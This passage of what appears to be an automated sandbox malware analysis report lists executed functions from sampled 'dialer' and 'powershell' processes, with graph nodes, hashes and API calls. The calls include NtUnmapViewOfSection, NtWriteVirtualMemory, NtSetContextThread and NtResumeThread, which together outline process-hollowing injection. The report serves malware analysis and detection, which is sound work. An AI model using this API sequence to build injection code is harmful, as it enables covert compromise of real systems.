140001a70-140001a77 607->612 609 140001b5c-140001b6c 608->609 610 140001b10-140001b20 608->610 609->600 614 140001b6f call 140001d40 609->614 610->607 610->609 611->612 613 140001b36-140001b57 call 140001ba0 611->613 612->586 612->597 613->609 614->600
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                          • API String ID: 544645111-395989641
                                                          • Opcode ID: a89914c2fd02570a4e6521a208eebb3515e1225b41bbed0033c188a81e2debbf
                                                          • Instruction ID: 7b3573af97f4a1eacab2cf6b7141f308442550d87ff31978870e308cef0d76bf
                                                          • Opcode Fuzzy Hash: a89914c2fd02570a4e6521a208eebb3515e1225b41bbed0033c188a81e2debbf
                                                          • Instruction Fuzzy Hash: 265105B6B11544DAEB12CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700
                                                          Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 618 140001800-140001810 619 140001812-140001822 618->619 620 140001824 618->620 621 14000182b-140001867 call 140002290 fprintf 619->621 620->621
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: fprintf
                                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                          • API String ID: 383729395-3474627141
                                                          • Opcode ID: 79a37540ab94a2aabdfc59d1104a7611d6a6ce1f6ae517b76ce8c7da1563a69f
                                                          • Instruction ID: a3faaabf629437a0964f4525ace193ebe5e29d4333283446a04dc1db5ce24221
                                                          • Opcode Fuzzy Hash: 79a37540ab94a2aabdfc59d1104a7611d6a6ce1f6ae517b76ce8c7da1563a69f
                                                          • Instruction Fuzzy Hash: 47F09671A14A8482E612EF6AB9417ED6361E75D7C1F50D211FF4DA76A1DF3CD182C310
                                                          Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 624 14000219e-1400021a5 625 140002272-140002280 624->625 626 1400021ab-1400021c2 EnterCriticalSection 624->626 627 140002265-14000226c LeaveCriticalSection 626->627 628 1400021c8-1400021d6 626->628 627->625 629 1400021e9-1400021f5 TlsGetValue GetLastError 628->629 630 1400021f7-1400021fa 629->630 631 1400021e0-1400021e7 629->631 630->631 632 1400021fc-140002209 630->632 631->627 631->629 632->631
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000041.00000002.3442105288.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000041.00000002.3441829333.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442303779.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442397948.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000041.00000002.3442510479.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                          • String ID:
                                                          • API String ID: 682475483-0
                                                          • Opcode ID: 75c239d6f9b1b05cd32b51954dacabd1d99c2907a8b4144d0770202a5cd4097e
                                                          • Instruction ID: 57be894ec6e479b01b3bdbc431c3049754870fdb45279c41188df5f75f20f987
                                                          • Opcode Fuzzy Hash: 75c239d6f9b1b05cd32b51954dacabd1d99c2907a8b4144d0770202a5cd4097e
                                                          • Instruction Fuzzy Hash: 2F01B6B5305A0192FA5BDB53FD083D86364BB6CBD1F854021EF09536B4DB75C996C300

                                                          Callgraph

                                                          • Executed
                                                          • Not Executed
                                                          • Opacity -> Relevance
                                                          • Disassembly available
                                                          callgraph 0 Function_0000000140832CF2 1 Function_0000000140832F61 2 Function_0000000140832D30 2->0 2->1 3 Function_0000000140832CB0 3->2

                                                          Executed Functions

                                                          Function 0000000140832D30 Relevance: 6.2, APIs: 4, Instructions: 209memorylibraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 140832d30-140832d33 1 140832d3d-140832d41 0->1 2 140832d43-140832d4b 1->2 3 140832d4d 1->3 2->3 4 140832d35-140832d3a 3->4 5 140832d4f-140832d52 3->5 4->1 6 140832d5b-140832d62 5->6 8 140832d64-140832d6c 6->8 9 140832d6e 6->9 8->9 10 140832d54-140832d59 9->10 11 140832d70-140832d73 9->11 10->6 12 140832d75-140832d83 11->12 13 140832d8e-140832d90 11->13 15 140832d85-140832d8a 12->15 16 140832ddd-140832dfc 12->16 17 140832d92-140832d98 13->17 18 140832d9a 13->18 20 140832dc4-140832dc7 15->20 22 140832d8c 15->22 19 140832e2d-140832e30 16->19 17->18 18->20 21 140832d9c-140832da0 18->21 25 140832e32-140832e33 19->25 26 140832e35-140832e3b 19->26 33 140832dc9-140832dd8 call 140832cf2 20->33 23 140832da2-140832da8 21->23 24 140832daa 21->24 22->21 23->24 24->20 27 140832dac-140832db3 24->27 28 140832e14-140832e18 25->28 30 140832e42-140832e46 26->30 44 140832db5-140832dbb 27->44 45 140832dbd 27->45 31 140832e1a-140832e1d 28->31 32 140832dfe-140832e01 28->32 34 140832e48-140832e60 LoadLibraryA 30->34 35 140832e9e-140832ea6 30->35 31->26 39 140832e1f-140832e23 31->39 32->26 36 140832e03 32->36 33->1 41 140832e62-140832e69 34->41 38 140832eaa-140832eb3 35->38 43 140832e04-140832e08 36->43 46 140832ee2-140832f42 VirtualProtect * 2 call 140832f61 38->46 47 140832eb5-140832eb7 38->47 39->43 48 140832e25-140832e2c 39->48 41->30 42 140832e6b 41->42 50 140832e77-140832e7f 42->50 51 140832e6d-140832e75 42->51 43->28 52 140832e0a-140832e0c 43->52 44->45 45->27 53 140832dbf-140832dc2 45->53 60 140832f47-140832f4c 46->60 54 140832eca-140832ed8 47->54 55 140832eb9-140832ec8 47->55 48->19 57 140832e81-140832e8d GetProcAddressForCaller 50->57 51->57 52->28 58 140832e0e-140832e12 52->58 53->33 54->55 59 140832eda-140832ee0 54->59 55->38 61 140832e98 ExitProcess 57->61 62 140832e8f-140832e96 57->62 58->28 58->31 59->55 63 140832f51-140832f56 60->63 62->41 63->63 64 140832f58 63->64
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000042.00000002.3442004748.000000014082C000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                          • Associated: 00000042.00000002.3441915647.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000042.00000002.3442004748.0000000140001000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000042.00000002.3442004748.00000001404C8000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000042.00000002.3442004748.00000001404EC000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000042.00000002.3442004748.0000000140777000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000042.00000002.3442004748.00000001407F8000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000042.00000002.3445427003.0000000140834000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_66_2_140000000_dialer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                          • String ID:
                                                          • API String ID: 1941872368-0
                                                          • Opcode ID: fc7b6a3bd621f7d17f98b0102345922539b498eb494b6f3c4a19026b9e8f6b5c
                                                          • Instruction ID: 490267afce550785c801030b00c3b8e77ffef9829ef37814adfd0db67bac2f23
                                                          • Opcode Fuzzy Hash: fc7b6a3bd621f7d17f98b0102345922539b498eb494b6f3c4a19026b9e8f6b5c
                                                          • Instruction Fuzzy Hash: 97614832F4025745FB275BAAEB853E86350A39D7B4F084721CBB9433F6E67A88568310

                                                          Executed Functions

                                                          Function 00007FFD3469DF98 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1011 7ffd3469df98-7ffd3469e049 1025 7ffd3469e04b-7ffd3469e069 1011->1025 1026 7ffd3469e0af-7ffd346a0b08 NtUnmapViewOfSection 1011->1026 1031 7ffd346a0b0a 1026->1031 1032 7ffd346a0b10-7ffd346a0b2c 1026->1032 1031->1032
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 66ec87d1f945297e3181e69690fae1ffa74a1eb4fde3fadaa7c2ff384a7652f8
                                                          • Instruction ID: 82a8c91f6afa6bfd9fba6e4defae79b1022a98334ea342f0b0534a8788f6c2ef
                                                          • Opcode Fuzzy Hash: 66ec87d1f945297e3181e69690fae1ffa74a1eb4fde3fadaa7c2ff384a7652f8
                                                          • Instruction Fuzzy Hash: A451E772A0D7844FDB12EB6898A56EA7FA0EF53214F0841FFC189CB193E95C9809CB51
                                                          Function 00007FFD346A0C5D Relevance: 1.6, APIs: 1, Instructions: 129nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1055 7ffd346a0c5d-7ffd346a0c69 1056 7ffd346a0c6b-7ffd346a0c73 1055->1056 1057 7ffd346a0c74-7ffd346a0ce8 1055->1057 1056->1057 1061 7ffd346a0cea-7ffd346a0cef 1057->1061 1062 7ffd346a0cf2-7ffd346a0d35 NtWriteVirtualMemory 1057->1062 1061->1062 1063 7ffd346a0d37 1062->1063 1064 7ffd346a0d3d-7ffd346a0d5a 1062->1064 1063->1064
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: MemoryVirtualWrite
                                                          • String ID:
                                                          • API String ID: 3527976591-0
                                                          • Opcode ID: 612906cca72b36756ae939d45c578b6aaeaa4ccc295d5ed56250a67fa343742e
                                                          • Instruction ID: cf6917a5f3970e6c90ade028a1361540a4590a50daaeaa04103089dfeb89879e
                                                          • Opcode Fuzzy Hash: 612906cca72b36756ae939d45c578b6aaeaa4ccc295d5ed56250a67fa343742e
                                                          • Instruction Fuzzy Hash: 5831D17190CB588FDB59DF58D8856E9BBE0FB6A321F04426ED049D3652CB74A806CB81
                                                          Function 00007FFD3469E078 Relevance: 1.6, APIs: 1, Instructions: 122nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1065 7ffd3469e078-7ffd3469e096
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: SectionUnmapView
                                                          • String ID:
                                                          • API String ID: 498011366-0
                                                          • Opcode ID: 75dc07dcbcd93011774c4f58a512b55f34254de34682c1b82d4496a8e22111da
                                                          • Instruction ID: 765639b25ce54d57d4f7054c0e5e9c1493ceb19fde21871af582bbb98654a14e
                                                          • Opcode Fuzzy Hash: 75dc07dcbcd93011774c4f58a512b55f34254de34682c1b82d4496a8e22111da
                                                          • Instruction Fuzzy Hash: 01315772A0CA488FEB59CF58D8497E9BBE0EBA6320F04416FD049D3193D674EC49C751
                                                          Function 00007FFD346A0A3E Relevance: 1.6, APIs: 1, Instructions: 118nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1068 7ffd346a0a3e-7ffd346a0a4b 1069 7ffd346a0a56-7ffd346a0b08 NtUnmapViewOfSection 1068->1069 1070 7ffd346a0a4d-7ffd346a0a55 1068->1070 1075 7ffd346a0b0a 1069->1075 1076 7ffd346a0b10-7ffd346a0b2c 1069->1076 1070->1069 1075->1076
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: SectionUnmapView
                                                          • String ID:
                                                          • API String ID: 498011366-0
                                                          • Opcode ID: 695bfb8554aac46042955458ff34f7189e86082f10c92c17940f7abc9413e331
                                                          • Instruction ID: 9c8db3c6c0b1ee288027724737dc919241a36ef91875f313038629c39156f85e
                                                          • Opcode Fuzzy Hash: 695bfb8554aac46042955458ff34f7189e86082f10c92c17940f7abc9413e331
                                                          • Instruction Fuzzy Hash: 1B31F531A0DB888FDB5ADFA888967E97FE0EF67320F04419AD049C7193D664A446CB91
                                                          Function 00007FFD346A0FE4 Relevance: 1.6, APIs: 1, Instructions: 114nativethreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1077 7ffd346a0fe4-7ffd346a0feb 1078 7ffd346a0ff6-7ffd346a10a2 NtResumeThread 1077->1078 1079 7ffd346a0fed-7ffd346a0ff5 1077->1079 1083 7ffd346a10aa-7ffd346a10c6 1078->1083 1084 7ffd346a10a4 1078->1084 1079->1078 1084->1083
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 40dd2c0a98b87b5a02a67e615f33549286361dadeacf3c68315bb18a64fa482a
                                                          • Instruction ID: e645ccfde1a18c15cd84b90129f0a80504258ebf7b20163a690026f068f68ab6
                                                          • Opcode Fuzzy Hash: 40dd2c0a98b87b5a02a67e615f33549286361dadeacf3c68315bb18a64fa482a
                                                          • Instruction Fuzzy Hash: F3312871A0CA5C8FDB59DF9CD8457EA7BE1EF56320F04416BD008D3252CB749806CB91
                                                          Function 00007FFD346A0F20 Relevance: 1.6, APIs: 1, Instructions: 97nativethreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1085 7ffd346a0f20-7ffd346a0fb8 NtSetContextThread 1089 7ffd346a0fba 1085->1089 1090 7ffd346a0fc0-7ffd346a0fdc 1085->1090 1089->1090
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: ContextThread
                                                          • String ID:
                                                          • API String ID: 1591575202-0
                                                          • Opcode ID: eb9860b81eab79942769cb89c151e76948351e05a2b950a32e99cc36f769f3b6
                                                          • Instruction ID: 4b9f8eb3e113d47e751419c1390d51366aa8484edecac7fc375c039f71d3b9e9
                                                          • Opcode Fuzzy Hash: eb9860b81eab79942769cb89c151e76948351e05a2b950a32e99cc36f769f3b6
                                                          • Instruction Fuzzy Hash: A621B431A0CA4C8FDB59DF98D8867E97BF0EB66320F04416FD049D3252C6749846CB51
                                                          Function 00007FFD346A0221 Relevance: 6.1, APIs: 1, Strings: 2, Instructions: 891processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: wKX\$wKX\
                                                          • API String ID: 963392458-3281236502
                                                          • Opcode ID: 473a1797e3848129c2fdea48e846f90c01edc82dfdcf274be323848b577e10e1
                                                          • Instruction ID: 2f1c806e5358b175a00eae8ccdbb0497aa8d2c352a26586deab7d6c75eddc0b8
                                                          • Opcode Fuzzy Hash: 473a1797e3848129c2fdea48e846f90c01edc82dfdcf274be323848b577e10e1
                                                          • Instruction Fuzzy Hash: 39D1F670609F894FEBA4DF2CC8967E977E0FF56310F04426BD84DC7292DA38A4458B82
                                                          Function 00007FFD3469EAFA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 249COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: CreateFileMapping
                                                          • String ID: wKX\$wKX\
                                                          • API String ID: 524692379-3281236502
                                                          • Opcode ID: 1edc40a78630b73ad1bd5566d9d7ffd68b1f33f0f1d5c02a7601f1fcc9fd5ce1
                                                          • Instruction ID: bfff3acdf0620676f126d19815347555e2b23580ac7183643492abbd611a99a6
                                                          • Opcode Fuzzy Hash: 1edc40a78630b73ad1bd5566d9d7ffd68b1f33f0f1d5c02a7601f1fcc9fd5ce1
                                                          • Instruction Fuzzy Hash: 0171E77060CB8D8FDB59DF28C8557E87BE1FF5A311F14426AE88DC7292DB74A8418B81
                                                          Function 00007FFD3469E8AC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 227fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: wKX\$wKX\
                                                          • API String ID: 823142352-3281236502
                                                          • Opcode ID: c49007042b4ae1135fb501050c0d8f29d89328b8aeec5cd13c32a8c5e5c99913
                                                          • Instruction ID: 4f580a1f5a782cf58d0714f8c290668c6f98e123386c198430670a850cae325a
                                                          • Opcode Fuzzy Hash: c49007042b4ae1135fb501050c0d8f29d89328b8aeec5cd13c32a8c5e5c99913
                                                          • Instruction Fuzzy Hash: EC61D730918B8D4FEB58DF68D8567E877E0FF59311F14426AE84DC3292DB74E8418B81
                                                          Function 00007FFD34760001 Relevance: 2.7, Instructions: 2717COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2365643408.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34760000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c5916a07696d479b5750dec19bea913bed7606b1019d65fa44af7531a3570130
                                                          • Instruction ID: cf3983f0cc6181169d53ffa0cf0b3637757ab8076dcc94c4ac28b01991012d58
                                                          • Opcode Fuzzy Hash: c5916a07696d479b5750dec19bea913bed7606b1019d65fa44af7531a3570130
                                                          • Instruction Fuzzy Hash: 7013D371A1CF958BE7B59F189895AA977E1EF99740F0505AED48CC3292CE38BC40C7C2
                                                          Function 00007FFD347600DD Relevance: 2.6, Instructions: 2589COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2365643408.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34760000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9b8811ce3f85bab14d456c4944db9821eb7659b810540003bb49270194910c46
                                                          • Instruction ID: 5a21975f14aa1ab7a654fbf64c69c3b46e95f0312c46edf240bc709221cde42e
                                                          • Opcode Fuzzy Hash: 9b8811ce3f85bab14d456c4944db9821eb7659b810540003bb49270194910c46
                                                          • Instruction Fuzzy Hash: 1413D471A1CF958BE7749F1898D5AA977E1EB99740F0505AED58CC3292CE38BC40CBC2
                                                          Function 00007FFD3469ED66 Relevance: 1.6, APIs: 1, Instructions: 138fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1033 7ffd3469ed66-7ffd3469ed73 1034 7ffd3469ed75-7ffd3469ed7d 1033->1034 1035 7ffd3469ed7e-7ffd3469ed8f 1033->1035 1034->1035 1036 7ffd3469ed9a-7ffd3469edaa 1035->1036 1037 7ffd3469ed91-7ffd3469ed99 1035->1037 1038 7ffd3469edac-7ffd3469eddc 1036->1038 1039 7ffd3469ede0-7ffd3469ee51 MapViewOfFile 1036->1039 1037->1036 1038->1039 1042 7ffd3469ee59-7ffd3469ee76 1039->1042 1043 7ffd3469ee53 1039->1043 1043->1042
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: FileView
                                                          • String ID:
                                                          • API String ID: 3314676101-0
                                                          • Opcode ID: fe81f5581243c5689c997e106a96b86f4061994ea6ae2098baedbb43c9012268
                                                          • Instruction ID: 8b7fd2c79850a316c51c3f12072b9315131d5f6966ce354e8beb8bbec3eaa84a
                                                          • Opcode Fuzzy Hash: fe81f5581243c5689c997e106a96b86f4061994ea6ae2098baedbb43c9012268
                                                          • Instruction Fuzzy Hash: 71413A3190CA888FEB1DDB68D855AE97BF0FF56321F14026FD089D3192DB686806C791
                                                          Function 00007FFD3469E7A8 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1044 7ffd3469e7a8-7ffd3469e7af 1045 7ffd3469e7ba-7ffd3469e7ca 1044->1045 1046 7ffd3469e7b1-7ffd3469e7b9 1044->1046 1047 7ffd3469e7cc-7ffd3469e7ff 1045->1047 1048 7ffd3469e800-7ffd3469e870 K32GetModuleInformation 1045->1048 1046->1045 1047->1048 1052 7ffd3469e878-7ffd3469e8a7 1048->1052 1053 7ffd3469e872 1048->1053 1053->1052
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2364080714.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34690000_powershell.jbxd
                                                          Similarity
                                                          • API ID: InformationModule
                                                          • String ID:
                                                          • API String ID: 3425974696-0
                                                          • Opcode ID: 76e86c87fcab641a7a14e27d24f4118fd5b604c0817560ccc7a1edcb80116e8a
                                                          • Instruction ID: 851c10cd9a3051c0a482f962e7ea166f9159ea068ed44e9c9527fd565d602557
                                                          • Opcode Fuzzy Hash: 76e86c87fcab641a7a14e27d24f4118fd5b604c0817560ccc7a1edcb80116e8a
                                                          • Instruction Fuzzy Hash: AB31E531A0CA5C4FDB18DBAC98496F9BBE1EF66321F04426FD049D3292DB756846CB81
                                                          Function 00007FFD34762BC5 Relevance: .4, Instructions: 374COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2365643408.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34760000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3da8c0ea446b2eef2df44d8648b3fd8f7940c971a5b44865a81098ad7d7a2531
                                                          • Instruction ID: 894922bd3293ad6ed27d644efa51755c8b68f934d8657c360205c7d6e0de46da
                                                          • Opcode Fuzzy Hash: 3da8c0ea446b2eef2df44d8648b3fd8f7940c971a5b44865a81098ad7d7a2531
                                                          • Instruction Fuzzy Hash: 0DB1F9A2B0EBC54FE7D6AA2858A91707BD2EF57220B1801FBD58DCB1D3D91D6C05D381
                                                          Function 00007FFD34762DE7 Relevance: .1, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000043.00000002.2365643408.00007FFD34760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34760000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_67_2_7ffd34760000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 91dac2f24d6214e3b69d48b0b5f2786e8de444b18248258c154829b5854989f9
                                                          • Instruction ID: 759de711ff82d5edf2578251cde0d37400c2716c5e8ed83dcfaadc4d11251abc
                                                          • Opcode Fuzzy Hash: 91dac2f24d6214e3b69d48b0b5f2786e8de444b18248258c154829b5854989f9
                                                          • Instruction Fuzzy Hash: 712106A3B0E6854FE3E5A67828E917477C1EF6612075805FAC45DCB2D3D81DAC099381

                                                          Executed Functions

                                                          Function 00000146F6B03620 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 00000146F6B03639
                                                          • PathFindFileNameW.SHLWAPI ref: 00000146F6B03648
                                                            • Part of subcall function 00000146F6B03C74: StrCmpNIW.SHLWAPI(?,?,?,00000146F6B0254B), ref: 00000146F6B03C8C
                                                            • Part of subcall function 00000146F6B03BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000146F6B0365F), ref: 00000146F6B03BCE
                                                            • Part of subcall function 00000146F6B03BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000146F6B0365F), ref: 00000146F6B03BFC
                                                            • Part of subcall function 00000146F6B03BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000146F6B0365F), ref: 00000146F6B03C1E
                                                            • Part of subcall function 00000146F6B03BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000146F6B0365F), ref: 00000146F6B03C39
                                                            • Part of subcall function 00000146F6B03BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000146F6B0365F), ref: 00000146F6B03C5A
                                                          • CreateThread.KERNELBASE ref: 00000146F6B0368F
                                                            • Part of subcall function 00000146F6B01D40: GetCurrentThread.KERNEL32 ref: 00000146F6B01D4B
                                                          Memory Dump Source
                                                          • Source File: 00000044.00000002.2378087271.00000146F6B01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000146F6B00000, based on PE: true
